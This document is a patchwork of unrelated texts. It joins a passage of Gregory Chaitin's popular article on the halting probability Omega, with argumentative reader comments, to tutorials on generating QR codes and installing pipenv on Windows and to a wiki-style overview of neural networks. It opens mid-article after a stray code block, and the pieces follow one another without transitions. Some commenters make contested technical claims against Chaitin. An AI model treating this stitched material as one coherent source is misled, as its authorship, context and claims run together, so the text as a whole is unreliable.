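```python
def run_doubling_program(x, max_steps=1000):
    # Simulate "keep multiplying x by 2 until the result is bigger than 1",
    # but give up after max_steps. "gave up" is NOT a proof of looping:
    # a timeout can never distinguish "slow" from "forever".
    for _ in range(max_steps):
        if x > 1:
            return "halted"
        x *= 2
    return "gave up"

print(run_doubling_program(0.25))  # halted
print(run_doubling_program(0))     # gave up (it would in fact run forever)
```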
And, as Turing proved, the answer is no.
What is Omega?
Now, instead of looking at individual instances of Turing's famous halting problem, you just put all possible computer programs into a bag, shake it well, pick out a program, and ask: "what is the probability that it will eventually halt?". This probability is the number Omega.
An example will make this clearer: suppose that in the whole wide world there are only two programs that eventually halt, and that these programs, when translated into bit strings, are 11001 and 101. Picking one of these at random is the same as randomly generating these two bit strings. You can do this by tossing a coin and writing down a 1 if heads comes up, and a 0 if tails comes up, so the probability of getting a particular bit is 1/2. This means that the probability of getting 11001 is $1/2 \times 1/2 \times 1/2 \times 1/2 \times 1/2 = 1/2^5$, and the probability of getting 101 is $1/2 \times 1/2 \times 1/2 = 1/2^3$. So the probability of randomly choosing one of these two programs is $1/2^5 + 1/2^3 = 5/32$.
Of course, in reality there are a lot more programs that halt, and Omega is the sum of lots of terms of the form $1/2^N$, one for each halting program that is $N$ bits long. Also, when defining Omega, you have to make certain restrictions on which types of programs are valid, to avoid counting things twice, and to make sure that Omega does not become infinitely large.
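Under the toy assumption of the example above, that the only halting programs are the bit strings 11001 and 101, the sum can be computed exactly:

```python
from fractions import Fraction

# Toy Omega under the example's assumption that the only halting
# programs are the bit strings 11001 and 101.
halting_programs = ["11001", "101"]
omega = sum(Fraction(1, 2 ** len(p)) for p in halting_programs)
print(omega, float(omega))  # 5/32 0.15625
```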
Anyway, once you do things properly you can define a halting probability Omega between zero and one. Omega is a perfectly decent number, defined in a mathematically rigorous way. The particular value of Omega that you get depends on your choice of computer programming language, but its surprising properties don't depend on that choice.
Why is Omega irreducible?
And what is the most surprising property of Omega? It's the fact that it is irreducible, or algorithmically random, and that it is infinitely complex. I'll try to explain why this is so: like any number we can, theoretically at least, write Omega in binary notation, as a string of 0s and 1s. In fact, Omega has an infinite binary expansion, just as the square root of two has an infinite decimal expansion: $\sqrt{2} = 1.41421356\ldots$
Now the square root of two can be approximated to any desired degree of accuracy by one of many algorithms. Newton's iteration, for example, uses the formula $x_{n+1} = \frac{x_n}{2} + \frac{1}{x_n}$: starting from $x_1 = 1$ it produces the successive approximations $x_2 = 1.5$, $x_3 = 1.41666\ldots$, and so on.
Is there a similar finite program that can compute all the bits in the binary expansion of Omega? Well, it turns out that knowing the first $N$ bits of Omega gives you a way of solving the halting problem for all programs up to $N$ bits in size. So, if you had a finite program that could work out all the bits of Omega, you would also have a finite program that could solve the halting problem for all programs, no matter what size. But this, as we know, is impossible. So such a program cannot exist.
According to our definition above, Omega is irreducible, or algorithmically random. It cannot be compressed into a smaller, finite theory. Even though Omega has a very precise mathematical definition, its infinitely many bits cannot be captured in a finite program — they are just as "bad" as a string of infinitely many bits chosen at random. In fact, Omega is maximally unknowable. Even though it is precisely defined once you specify the programming language, its individual bits are maximally unknowable, maximally irreducible.
Why does maths have no TOEs?
This question is now easy to answer. A mathematical theory consists of a set of "axioms" — basic facts which we perceive to be self-evident and which need no further justification — and a set of rules about how to draw logical conclusions.
So a Theory of Everything would be a set of axioms from which we can deduce all mathematical truths and derive all mathematical objects. It would also have to have finite complexity, otherwise it wouldn't be a theory. Since it's a TOE it would have to be able to compute Omega, a perfectly decent mathematical object. The theory would have to provide us with a finite program which contains enough information to compute any one of the bits in Omega's binary expansion. But this is impossible because Omega, as we've just seen, is infinitely complex — no finite program can compute it. There is no theory of finite complexity that can deduce Omega.
So this is an area in which mathematical truth has absolutely no structure, no structure that we will ever be able to appreciate in detail, only statistically. The best way of thinking about the bits of Omega is to say that each bit has probability 1/2 of being zero and probability 1/2 of being one, even though each bit is mathematically determined.
That's where Turing's halting problem has led us, to the discovery of pure randomness in a part of mathematics. I think that Turing and Leibniz would be delighted at this remarkable turn of events. Gödel's incompleteness theorem tells us that within mathematics there are statements that are unknowable, or undecidable. Omega tells us that there are in fact infinitely many such statements: whether any one of the infinitely many bits of Omega is a 0 or a 1 is something we cannot deduce from any mathematical theory. More precisely, any maths theory enables us to determine at most finitely many bits of Omega.
Where does this leave us?
Now I'd like to make a few comments about what I see as the philosophical implications of all of this. These are just my views, and they are quite controversial. For example, even though a recent critical review of two of my books in the Notices of the American Mathematical Society does not claim that there are any technical mistakes in my work, the reviewer strongly disagrees with my philosophical conclusions, and in fact he claims that my work has no philosophical implications whatsoever. So these are just my views, they are certainly not a community consensus, not at all.
Is maths an experimental science?
My view is that Omega is a much more disagreeable instance of mathematical incompleteness than the one found by Gödel in 1931, and that it therefore forces our hand philosophically. In what way? Well, in my opinion, in a quasi-empirical direction, which is a phrase coined by Imre Lakatos when he was doing philosophy in England after leaving Hungary in 1956. In my opinion, Omega suggests that even though maths and physics are different, perhaps they are not as different as most people think.
To put it bluntly, if the incompleteness phenomenon discovered by Gödel in 1931 is really serious — and I believe that Turing's work and my own work suggest that incompleteness is much more serious than people think — then perhaps mathematics should be pursued somewhat more in the spirit of experimental science rather than always demanding proofs for everything. Maybe, rather than attempting to prove results such as the celebrated Riemann hypothesis, mathematicians should accept that they may not be provable and simply adopt them as axioms.
At any rate, that's the way things seem to me. Perhaps by the time we reach the centenary of Turing's death in 2054, this quasi-empirical view will have made some headway, or perhaps instead these foreign ideas will be utterly rejected by the immune system of the maths community. For now they certainly are rejected. But the past fifty years have brought us many surprises, and I expect that the next fifty years will too, a great many indeed.
About the author
Gregory Chaitin is at the IBM Thomas J. Watson Research Center in Yorktown Heights, New York, and is an honorary professor at the University of Buenos Aires and a visiting professor at the University of Auckland. The author of nine books, he is also a member of the International Academy of the Philosophy of Science, as well as the Honorary President of the Scientific Committee of the Institute of Complex Systems in Valparaiso, Chile. His latest book, Meta Math!, published by Pantheon in New York, is intended as popular science.
you have got an error in the sentence:
"This means that the probability of getting 101 is $1/2 \times 1/2 \times 1/2 \times 1/2 \times 1/2 = 1/2^5.$"
The right sentence is :
This means that the probability of getting 101 is $1/2 \times 1/2 \times 1/2 = 1/2^3$.
Thanks for pointing out the error, it's been corrected!
"Second, instead of
"Second, instead of mathematical equations, we use binary computer programs. "
That substitution is extremely domain-narrowing. Modern mathematics has happily secluded itself within the borders it drew for itself (Gödel's incompleteness, etc.),
and after that it has even more happily narrowed those borders through the substitution mentioned above.
The purpose of borders is to be transcended. Leibniz did not happily seclude himself
into counting tortoise steps ahead of Achilles' steps. No. Instead he transcended the borders of the sequential counting process. In the same way, modern mathematics should strive to transcend the borders of the sequentiality imposed by the natural numbers (i.e. Gödel's incompleteness), the Turing machine and the like...
With best regards,
an MS in Mathematics with high GPA.
What about the Mlodinow-Hawking book about a Creator?
At last, the -kins and -king surnamed authors have started producing antireligious TOEs...
Omega doesn't prove a TOE doesn't exist
While I don't necessarily think there is (or should be) a TOE, Omega does not serve as proof for the non-existence of a TOE.
This is simply because a TOE is not at all required to allow deriving Omega from it.
Omega is defined in domain terms, broadly taken from computer science. We can come up with other mathematically rigorous definitions of numbers standing for philosophical issues that cannot be computed. These are applications. Mathematics has no interest in that.
Chaitin's Assertions are not Well-Founded
I agree that Chaitin has not provided a proof that there is no TOE. Furthermore, almost none of what he says is well-defined. Omega itself is not a number, but rather a function of an arbitrary universal Turing Machine.
Chaitin says that the Godel Sentence is true but for no reason since Mathematics is actually random, so there is no proof of it. But the Godel Sentence is true because of how it is constructed, and we can in fact prove it true - Godel proves it true or else his article would be worthless, a theorem without a proof - we simply can't prove it using Godel's formal system. Godel himself says that what his formal system cannot prove can be proven using metamathematics.
Chaitin says that he has a better proof of incompleteness than Godel, but Rosser already did that by proving a stronger theorem. Godel's proof requires w-consistency, but Rosser's proof works with any consistent system, which includes all w-consistent systems and also others. It is a stronger result. So it makes no sense to offer more proofs of a weaker theorem. Rosser's theorem is stronger.
Chaitin says that Omega is the chance that a random Turing Machine will halt. Whatever way he defines a number, it cannot be the probability that a random Turing Machine will halt because there is no such probability. The notion of that being a probability is not well-defined. We can easily construct a Turing Machine (program) that halts for the first few inputs, loops on the next inputs for a lot more inputs, halts on the next inputs for even more inputs etc. so the chance that it halts fluctuates between 1/3 and 2/3, depending on how many inputs you consider. It diverges rather than converges.
Chaitin says that he learned Godel's proof as a child, but he has never discussed the actual proof based on w-consistency, or even mentioned Rosser's proof. Furthermore, even when he talks about the far simpler Turing proof of the Unsolvability of the Halting Problem, he gets it wrong. He says that a program that would tell if another program halts could be run on itself. But that program has an input, while the input of that program is a single program with no input. What Turing actually defined was a program that halts if its input does not halt on itself, and loops if its input does halt on itself. The input is a single program because that program's input is itself.
Re: Chaitin's Assertions are not Well-Founded
"We can easily construct a Turing Machine (program) that halts for the first few inputs, loops on the next inputs for a lot more inputs, halts on the next inputs for even more inputs etc. so the chance that it halts fluctuates between 1/3 and 2/3, depending on how many inputs you consider. It diverges rather than converges."
You are supposing an (impossible) uniform distribution in a countable set. Longer inputs have smaller weights.
Chaitin's Assertions are not Well-Founded
At each point we have considered only a finite number of strings. Then it is always possible to add many times that many to tilt the probability back and forth. Note "halts for the first few inputs, loops on the next inputs for a lot more inputs".
What is the probability that the program that I describe will halt? There is none. "Probability of Halting" is as ill-defined as almost everything Chaitin says. His first version of omega was >1 (depending on how the Turing Machine is encoded!) which took him 20 years to realize and add a kludge rule about programs being inside of other programs. Now how does he know what THAT will produce?
His Invariance Theorem (that is said to be the foundation of his theory) is false. There is no bound between the lengths of the shortest program to perform a given function in two different programming languages (to justify using "length of the shortest program") because one language could require each character to be repeated 2 or more times due to its use over unreliable communications lines, and so the length can differ by any factor or absolute difference. "Length of the shortest program" is simple-minded nonsense - just like his "This is unprovable." use, the extent of his understanding of Godel - which is only the weaker Godel theorem based on Soundness and still weaker than Rosser's based on consistency - which is the maximum possible because in an inconsistent system every sentence is provable so there is no sentence that is undecidable.
Newton's Iteration Formula
The fault probably lies with me, but for some strange reason I keep getting the answer (for X3) 1.1666... rather than 1.4166...
I've just tried it again - 1.166666667. Why is the '4' not appearing? For the previous iteration (X2) I came up with the correct value that you have there (i.e. 1.5), so...
To comment on your philosophical proposal, Greg. I don't know very much about the Riemann Hypothesis, (say), but is it important enough to be an axiom? For example, Fermat's Last Theorem was of little significance to number theory (so I've read), by comparison with the mathematical discoveries made in the attempt to prove it. How should a mathematician decide when enough is enough, and consign an otherwise useless hypothesis to the axiomatic waste bin?
I only wish that I had had an opportunity when young to have studied Physics and Maths and the sciences. It is only in my later years, and with grateful thanks to all those wondrous Internet sites, that I can read with enthusiasm and try to understand most of it.
My closest was Physics O level at TAFE College and discussing these things with fellow students over a pint.
An offer for my PhD came in my 50s... way too late for me. So I wish to thank you and other scholars for sharing the stories, the knowledge and the discussions for people like me.
How to Read a .txt File and Create a QR Code with Fewer Blocks?
On this page, you will see examples of how to read a .txt file and create a QR Code with fewer blocks in Python and C#.
To create a QR Code with fewer blocks, you can use a lower error correction level. Here's an example of how you can read a .txt file and generate a QR Code with the "Low" error correction level using the qrcode library in Python.
import qrcode

# Read the contents of the text file
with open('myfile.txt', 'r') as file:
    data = file.read()

# Generate a QR Code with the Low error correction level
qr = qrcode.QRCode(
    version=None,
    error_correction=qrcode.constants.ERROR_CORRECT_L,
    box_size=10,
    border=4,
)
qr.add_data(data)
qr.make(fit=True)

# Save the QR Code as an image file
img = qr.make_image(fill_color="black", back_color="white")
img.save("qrcode.png")
1. In this example, we first read the contents of the text file using Python's built-in open function. Then, we create a QR Code object using the qrcode.QRCode class, specifying the Low error correction level using the qrcode.constants.ERROR_CORRECT_L constant. We also set the box size and border of the QR Code using the box_size and border parameters.
2. Next, we add the data from the text file to the QR Code object using the qr.add_data method, and then generate the QR Code using the qr.make method.
3. Finally, we save the QR Code as an image file using the qr.make_image method and the img.save method.
Note that reducing the error correction level can make the QR Code less resilient to damage or distortion, so it's important to consider the intended use case when choosing the error correction level.
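To see why a lower error correction level produces a smaller symbol, it helps to look at the byte-mode data capacities of the first few QR versions. The sketch below uses capacity figures as commonly published for versions 1 to 4 (treat the table, and the helper around it, as illustrative rather than authoritative):

```python
# Byte-mode data capacities (characters) for QR versions 1-4 at each
# error correction level, as commonly published; treat as illustrative.
CAPACITY = {
    "L": [17, 32, 53, 78],
    "M": [14, 26, 42, 62],
    "Q": [11, 20, 32, 46],
    "H": [7, 14, 24, 34],
}

def smallest_version(num_bytes, ec_level):
    """Smallest QR version (1-4) holding num_bytes at ec_level, plus the
    resulting modules per side (a version-v symbol is 21 + 4*(v-1) wide)."""
    for version, capacity in enumerate(CAPACITY[ec_level], start=1):
        if num_bytes <= capacity:
            return version, 21 + 4 * (version - 1)
    raise ValueError("data too long for versions 1-4")

print(smallest_version(20, "L"))  # (2, 25): level L needs only version 2
print(smallest_version(20, "H"))  # (3, 29): level H needs version 3
```

At the same data length, level L fits in a smaller version, and therefore fewer modules per side, than level H.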
Here is example code for reading a .txt file and creating a QR Code with fewer blocks using the BarcodeBC.com .NET QR Code Generator Library.
using BC.NetWinBarcodeGeneratorTrial.Qrcode;

// Read the text from the .txt file
string text = System.IO.File.ReadAllText(@"C:\path\to\file.txt");

// Create a QR Code image and set its options
Qrcode qrcode = new Qrcode();
qrcode.SetData = text;
qrcode.SetUOM = UnitofMeasurement.Pixel;
qrcode.SetModuleSize = 2;
qrcode.SetECL = QrcodeECL.LevelL;
qrcode.SetLeftSpace = 5;
qrcode.SetRightSpace = 5;
qrcode.SetTopSpace = 5;
qrcode.SetBottomSpace = 5;

// Save the QR Code image to file
qrcode.GenerateBarcode(@"C:\path\to\qr_code.png");
In this example, the error correction level (SetECL) is set to LevelL, which results in fewer blocks in the QR Code, and the quiet zone is set to 5 pixels on each side. You can adjust these options according to your needs.
In addition, BarcodeBC.com also provides a mature .NET QR Code generator library for PDF files, as well as a .NET barcode reader library for QR Code.
Summary: in this tutorial, you’ll learn how to install the pipenv packaging tool on Windows and how to configure a project with a new virtual environment using Python's pipenv.

Before installing the pipenv tool, you need to have Python and pip installed on your computer.
First, open the Command Prompt or Windows PowerShell and type the following command:

python -V

Note that the letter V in -V is uppercase. If you see the Python version like the following:
Python 3.8.5
…then you already have Python installed on your computer. Otherwise, you need to install Python first.
Second, use the following command to check if you have the pip tool on your computer:

pip -V
It’ll return something like this:
pip 20.2.4 from C:\Users\<username>\AppData\Roaming\Python\Python38\site-packages\pip (python 3.8)
Install pipenv on Windows
First, use the following command to install pipenv:

pip install pipenv
Second, replace <username> in the following paths with your Windows username and add them to the PATH environment variable:

C:\Users\<username>\AppData\Roaming\Python\Python38\site-packages
C:\Users\<username>\AppData\Roaming\Python\Python38\Scripts
It’s important to notice that after changing the PATH environment variable, you need to close the Command Prompt and reopen it.
Third, type the following command to check if pipenv was installed correctly:

pipenv -h
If it shows the following output, then you’ve installed the pipenv tool successfully:
Usage: pipenv [OPTIONS] COMMAND [ARGS]...
...
However, if you see the following message:

'pipenv' is not recognized as an internal or external command, operable program or batch file.
Then you should check step 2 to see if you have already added the paths to the PATH environment variable.
At this point, you have installed the pipenv tool on your Windows computer.
Creating a new project
First, create a new project folder, e.g., crawler.
Second, navigate to the crawler folder and install the requests package using the pipenv command:

pipenv install requests
Creating a Pipfile for this project…
Installing requests…
Adding requests to Pipfile's [packages]…
Installation Succeeded
Pipfile.lock not found, creating…
Locking [dev-packages] dependencies…
Locking [packages] dependencies…
Locking... Building requirements...
Resolving dependencies...
Success!
Updated Pipfile.lock (fbd99e)!
Installing dependencies from Pipfile.lock (fbd99e)…
================================ 0/0 - 00:00:00
And you’ll see that pipenv created two new files called Pipfile and Pipfile.lock. On top of that, it created a virtual environment.
If you look at the project folder, you won’t see the virtual environment folder.
To find the location of the virtual environment, you use the following command:

pipenv --venv
It’ll return something like this on Windows:
C:\Users\<username>\.virtualenvs\crawler-7nwusESR
Note that <username> is the username that you use to log in to Windows.
Third, create a new file called app.py in the project folder and add the following code to the file:

import requests

response = requests.get('https://www.python.org/')
print(response.status_code)

In this code, we imported the requests third-party module, used its get() function to make an HTTP request to the URL https://www.python.org/, and displayed the HTTP status code of the response.
Fourth, run the app.py file from the terminal by using the python command:

python app.py
It’ll show the following error:

ModuleNotFoundError: No module named 'requests'
The reason is that Python couldn’t locate the new virtual environment. To fix this, you need to activate the virtual environment.
Fifth, use the following command to activate the new virtual environment:

pipenv shell
If you run app.py now, it should work correctly:

python app.py
The status code 200 means the HTTP request has succeeded.
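Status codes are grouped by their first digit, with 2xx meaning success. A tiny helper (illustrative only, not part of the requests library) makes the convention explicit:

```python
def describe_status(code):
    # HTTP status codes are grouped by their first digit.
    categories = {1: "informational", 2: "success", 3: "redirection",
                  4: "client error", 5: "server error"}
    return categories.get(code // 100, "unknown")

print(describe_status(200))  # success
print(describe_status(404))  # client error
```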
Sixth, use the exit command to deactivate the virtual environment:

exit
Resolving the Unresolved Import Warning in VS Code
If you’re using VS Code, you may receive an unresolved import warning. The reason is that VS Code doesn’t know which Python interpreter to use.
Therefore, you need to switch the Python interpreter to the one located in the new virtual environment:
First, click the current Python interpreter at the right bottom corner of the VS Code:
Second, select the Python interpreter from the list:
In addition, you need to change the python.jediEnabled parameter in the settings.json file.

To open the settings.json file, you open the Command Palette with the keyboard shortcut CTRL + SHIFT + P on Windows or CMD + SHIFT + P on macOS:
And then change the value to true as follows:

"python.jediEnabled": true
After that, you should save the file and restart VS Code for the change to take effect.
Traditionally, the term neural network had been used to refer to a network or circuitry of biological neurons. The modern usage of the term often refers to artificial neural networks, which are composed of artificial neurons or nodes. Thus the term 'Neural Network' has two distinct connotations:
- Biological neural networks are made up of real biological neurons that are connected or functionally-related in the peripheral nervous system or the central nervous system. In the field of neuroscience, they are often identified as groups of neurons that perform a specific physiological function in laboratory analysis.
- Artificial neural networks are made up of interconnecting artificial neurons (usually simplified neurons) which may share some properties of biological neural networks. Artificial neural networks may either be used to gain an understanding of biological neural networks, or for solving traditional artificial intelligence tasks without necessarily attempting to model a real biological system.
Please see the corresponding articles for details on artificial neural networks or biological neural networks. This article focuses on the relationship between the two concepts.
In general a biological neural network is composed of a group or groups of chemically connected or functionally associated neurons. A single neuron may be connected to many other neurons and the total number of neurons and connections in a network may be extensive. Connections, called synapses, are usually formed from axons to dendrites, though dendrodendritic microcircuits and other connections are possible. Apart from the electrical signaling, there are other forms of signaling that arise from neurotransmitter diffusion, which have an effect on electrical signaling. As such, neural networks are extremely complex. While a detailed description of neural systems so far remains elusive, progress is being made towards a better understanding of basic mechanisms.
Artificial intelligence and cognitive modeling try to simulate some properties of neural networks. While similar in their techniques, the former has the aim of solving particular tasks, while the latter aims to build mathematical models of biological neural systems.
In the artificial intelligence field, artificial neural networks have been applied successfully to speech recognition, image analysis and adaptive control, in order to construct software agents (in computer and video games) or autonomous robots. Most of the currently employed artificial neural networks for artificial intelligence are based on statistical estimation, optimization and control theory.
The cognitive modelling field is the physical or mathematical modeling of the behaviour of neural systems; ranging from the individual neural level (e.g. modelling the spike response curves of neurons to a stimulus), through the neural cluster level (e.g. modelling the release and effects of dopamine in the basal ganglia) to the complete organism (e.g. behavioural modelling of the organism's response to stimuli).
The brain, neural networks and computers
Neural networks, as used in artificial intelligence, have traditionally been viewed as simplified models of neural processing in the brain, even though the relation between this model and the brain's biological architecture is debated. To address this question, David Marr proposed various levels of analysis, which provide us with a plausible account of the role of neural networks in the understanding of human cognitive functioning.
A subject of current research in theoretical neuroscience is the question surrounding the degree of complexity and the properties that individual neural elements should have to reproduce something resembling animal intelligence.
Historically, computers evolved from the von Neumann architecture, which is based on sequential processing and execution of explicit instructions. On the other hand, the origins of neural networks are based on efforts to model information processing in biological systems, which may rely largely on parallel processing as well as implicit instructions based on recognition of patterns of 'sensory' input from external sources. In other words, rather than sequential processing and execution, at their very heart, neural networks are complex statistical processors.
Neural networks and artificial intelligence
An artificial neural network (ANN), also called a simulated neural network (SNN) or commonly just neural network (NN) is an interconnected group of artificial neurons that uses a mathematical or computational model for information processing based on a connectionist approach to computation. In most cases an ANN is an adaptive system that changes its structure based on external or internal information that flows through the network.
In more practical terms neural networks are non-linear statistical data modeling or decision making tools. They can be used to model complex relationships between inputs and outputs or to find patterns in data.
An artificial neural network involves a network of simple processing elements (artificial neurons) which can exhibit complex global behaviour, determined by the connections between the processing elements and element parameters. One classical type of artificial neural network is the Hopfield net.
In a neural network model simple nodes, which can be called variously "neurons", "neurodes", "Processing Elements" (PE) or "units", are connected together to form a network of nodes — hence the term "neural network". While a neural network does not have to be adaptive per se, its practical use comes with algorithms designed to alter the strength (weights) of the connections in the network to produce a desired signal flow.
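The idea of adjusting connection weights to produce a desired signal flow can be illustrated with the smallest possible case: a single artificial neuron trained with the classic perceptron rule. This is a minimal sketch, not a practical network:

```python
def step(x):
    # Threshold ("all-or-nothing") activation, loosely analogous to a
    # neuron firing once its summed input reaches a threshold.
    return 1 if x >= 0 else 0

def neuron(inputs, weights, bias):
    # Weighted sum of inputs followed by the activation function.
    return step(sum(i * w for i, w in zip(inputs, weights)) + bias)

def train_perceptron(samples, epochs=20, lr=1):
    # Perceptron rule: nudge each weight in proportion to its input and
    # the output error. An integer learning rate keeps the arithmetic exact.
    weights, bias = [0, 0], 0
    for _ in range(epochs):
        for inputs, target in samples:
            error = target - neuron(inputs, weights, bias)
            weights = [w + lr * error * i for w, i in zip(weights, inputs)]
            bias += lr * error
    return weights, bias

# Learn the logical AND function from labelled examples.
AND = [((0, 0), 0), ((0, 1), 0), ((1, 0), 0), ((1, 1), 1)]
w, b = train_perceptron(AND)
print([neuron(i, w, b) for i, _ in AND])  # [0, 0, 0, 1]
```

After training, the neuron's weights and bias implement the AND function: only the input (1, 1) drives the weighted sum up to the threshold.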
In modern software implementations of artificial neural networks the approach inspired by biology has more or less been abandoned for a more practical approach based on statistics and signal processing. In some of these systems neural networks, or parts of neural networks (such as artificial neurons) are used as components in larger systems that combine both adaptive and non-adaptive elements.
The utility of artificial neural network models lies in the fact that they can be used to infer a function from observations. This is particularly useful in applications where the complexity of the data or task makes the design of such a function by hand impractical.
Real life applications
The tasks to which artificial neural networks are applied tend to fall within the following broad categories:
- Function approximation, or regression analysis, including time series prediction and modelling.
- Classification, including pattern and sequence recognition, novelty detection and sequential decision making.
- Data processing, including filtering, clustering, blind signal separation and compression.
Application areas include system identification and control (vehicle control, process control), game-playing and decision making (backgammon, chess, racing), pattern recognition (radar systems, face identification, object recognition and more), sequence recognition (gesture, speech, handwritten text recognition), medical diagnosis, financial applications, data mining (or knowledge discovery in databases, "KDD"), visualisation and e-mail spam filtering.
Neural network software
Main article: Neural network software
Neural network software is used to simulate, research, develop and apply artificial neural networks, biological neural networks and in some cases a wider array of adaptive systems.
There are three major learning paradigms, each corresponding to a particular abstract learning task. These are supervised learning, unsupervised learning and reinforcement learning. Usually any given type of network architecture can be employed in any of those tasks.
In supervised learning, we are given a set of example pairs <math> (x, y), x \in X, y \in Y</math> and the aim is to find a function <math>f</math> in the allowed class of functions that matches the examples. In other words, we wish to infer the mapping implied by the data; the cost function is related to the mismatch between our mapping and the data.
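To make this concrete, here is a minimal sketch (in Python, an illustration rather than anything from the text) of supervised learning as cost minimization: the allowed class of functions is lines f(x) = wx + b, and gradient descent reduces the mismatch between the mapping and the example pairs.

```python
# Supervised learning as cost minimization: given example pairs (x, y),
# pick f from a restricted class (here, lines f(x) = w*x + b) that
# minimizes the mismatch (mean squared error) with the data.
def fit_line(pairs, steps=2000, lr=0.01):
    w, b = 0.0, 0.0
    n = len(pairs)
    for _ in range(steps):
        # gradient of the mean squared error with respect to w and b
        gw = sum(2 * (w * x + b - y) * x for x, y in pairs) / n
        gb = sum(2 * (w * x + b - y) for x, y in pairs) / n
        w -= lr * gw
        b -= lr * gb
    return w, b

pairs = [(0, 1), (1, 3), (2, 5), (3, 7)]  # generated by y = 2x + 1
w, b = fit_line(pairs)
```

Since a perfect line exists for this data, the recovered parameters approach w = 2, b = 1.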
In unsupervised learning we are given some data <math>x</math>, and a cost function to be minimized which can be any function of <math>x</math> and the network's output, <math>f</math>. The cost function is determined by the task formulation. Most applications fall within the domain of estimation problems such as statistical modeling, compression, filtering, blind source separation and clustering.
In reinforcement learning, data <math>x</math> is usually not given, but generated by an agent's interactions with the environment. At each point in time <math>t</math>, the agent performs an action <math>y_t</math> and the environment generates an observation <math>x_t</math> and an instantaneous cost <math>c_t</math>, according to some (usually unknown) dynamics. The aim is to discover a policy for selecting actions that minimises some measure of a long-term cost, i.e. the expected cumulative cost. The environment's dynamics and the long-term cost for each policy are usually unknown, but can be estimated. ANNs are frequently used in reinforcement learning as part of the overall algorithm. Tasks that fall within the paradigm of reinforcement learning are control problems, games and other sequential decision making tasks.
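As an illustration of this setting (a deliberately tiny, hypothetical environment; the actions, costs and parameters are all made up), an agent can estimate per-action costs from the instantaneous cost signal and pick the action that minimises them:

```python
import random

# A tiny illustration of the reinforcement-learning setting described
# above: the agent repeatedly performs an action, the environment returns
# an instantaneous cost, and the agent learns cost estimates per action.
# Hypothetical environment: action 0 costs about 1.0, action 1 about 0.2.
def instantaneous_cost(action, rng):
    base = 1.0 if action == 0 else 0.2
    return base + rng.uniform(-0.05, 0.05)

def learn_policy(episodes=2000, lr=0.1, eps=0.2, seed=0):
    rng = random.Random(seed)
    q = [0.0, 0.0]  # estimated cost of each action
    for _ in range(episodes):
        # epsilon-greedy: usually pick the cheapest-looking action
        a = rng.randrange(2) if rng.random() < eps else min((0, 1), key=lambda i: q[i])
        c = instantaneous_cost(a, rng)
        q[a] += lr * (c - q[a])  # move the estimate toward the observed cost
    return q

q = learn_policy()
best_action = min((0, 1), key=lambda i: q[i])
```

After enough interactions the agent's estimates reflect the true costs, so it settles on the cheaper action.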
There are many algorithms for training neural networks; most of them can be viewed as a straightforward application of optimization theory and statistical estimation.
Evolutionary computation methods, simulated annealing, expectation maximization and non-parametric methods are among other commonly used methods for training neural networks. See also machine learning.
Recent developments in this field have also seen the use of particle swarm optimization and other swarm intelligence techniques in the training of neural networks.
Neural networks and neuroscience
Theoretical and computational neuroscience is the field concerned with the theoretical analysis and computational modeling of biological neural systems. Since neural systems are intimately related to cognitive processes and behaviour, the field is closely related to cognitive and behavioural modeling.
The aim of the field is to create models of biological neural systems in order to understand how biological systems work. To gain this understanding, neuroscientists strive to make a link between observed biological processes (data), biologically plausible mechanisms for neural processing and learning (biological neural network models) and theory (statistical learning theory and information theory).
Types of models
Many models are used in the field, each defined at a different level of abstraction and trying to model different aspects of neural systems. They range from models of the short-term behaviour of individual neurons, through models of how the dynamics of neural circuitry arise from interactions between individual neurons, to models of how behaviour can arise from abstract neural modules that represent complete subsystems. These include models of the long-term and short-term plasticity of neural systems and its relation to learning and memory, from the individual neuron to the system level.
While initially research had been concerned mostly with the electrical characteristics of neurons, a particularly important part of the investigation in recent years has been the exploration of the role of neuromodulators such as dopamine, acetylcholine, and serotonin on behaviour and learning.
- Peter Dayan, L.F. Abbott. Theoretical Neuroscience. MIT Press.
- Wulfram Gerstner, Werner Kistler. Spiking Neuron Models: Single Neurons, Populations, Plasticity. Cambridge University Press.
History of the neural network analogy
The concept of neural networks started in the late 1800s as an effort to describe how the human mind performed. These ideas started being applied to computational models with the Perceptron.
In the early 1950s Friedrich Hayek was one of the first to posit the idea of spontaneous order in the brain arising out of decentralized networks of simple units (neurons). In the late 1940s, Donald Hebb made one of the first hypotheses for a mechanism of neural plasticity (i.e. learning), Hebbian learning. Hebbian learning is considered to be a 'typical' unsupervised learning rule and it (and variants of it) was an early model for long term potentiation.
The Perceptron is essentially a linear classifier for classifying data <math> x \in R^n</math> specified by parameters <math>w \in R^n, b \in R</math> and an output function <math>f = w'x + b</math>. Its parameters are adapted with an ad-hoc rule similar to stochastic steepest gradient descent. Because the inner product is a linear operator in the input space, the Perceptron can only perfectly classify a set of data for which the different classes are linearly separable in the input space, while it often fails completely for non-separable data. While the development of the algorithm initially generated some enthusiasm, partly because of its apparent relation to biological mechanisms, the later discovery of this inadequacy caused such models to be abandoned until the introduction of non-linear models into the field.
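A minimal sketch of the Perceptron just described (Python used for illustration; the data and parameters are made up): the classifier is f(x) = sign(w'x + b), and the classic error-driven update succeeds here because the example data is linearly separable.

```python
# A sketch of the Perceptron: a linear classifier f(x) = sign(w'x + b),
# trained with the classic error-driven update rule.
def train_perceptron(data, epochs=100):
    n = len(data[0][0])
    w = [0.0] * n
    b = 0.0
    for _ in range(epochs):
        for x, label in data:  # label is +1 or -1
            activation = sum(wi * xi for wi, xi in zip(w, x)) + b
            pred = 1 if activation >= 0 else -1
            if pred != label:  # update only on mistakes
                w = [wi + label * xi for wi, xi in zip(w, x)]
                b += label
    return w, b

def predict(w, b, x):
    return 1 if sum(wi * xi for wi, xi in zip(w, x)) + b >= 0 else -1

# Linearly separable data: class +1 roughly where x0 + x1 > 1.5
data = [([0, 0], -1), ([1, 0], -1), ([0, 1], -1),
        ([1, 1], 1), ([2, 1], 1), ([1, 2], 1)]
w, b = train_perceptron(data)
```

On linearly separable data like this, the Perceptron convergence theorem guarantees a perfect separator is found; on non-separable data (e.g. XOR) the same loop never settles.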
The Cognitron (1975) was an early multilayered neural network with a training algorithm. The actual structure of the network and the methods used to set the interconnection weights change from one neural strategy to another, each with its advantages and disadvantages. Networks can propagate information in one direction only, or they can bounce back and forth until self-activation at a node occurs and the network settles on a final state. The ability for bi-directional flow of inputs between neurons/nodes was produced with Hopfield's network (1982), and specialization of these node layers for specific purposes was introduced through the first hybrid network.
The parallel distributed processing of the mid-1980s became popular under the name connectionism.
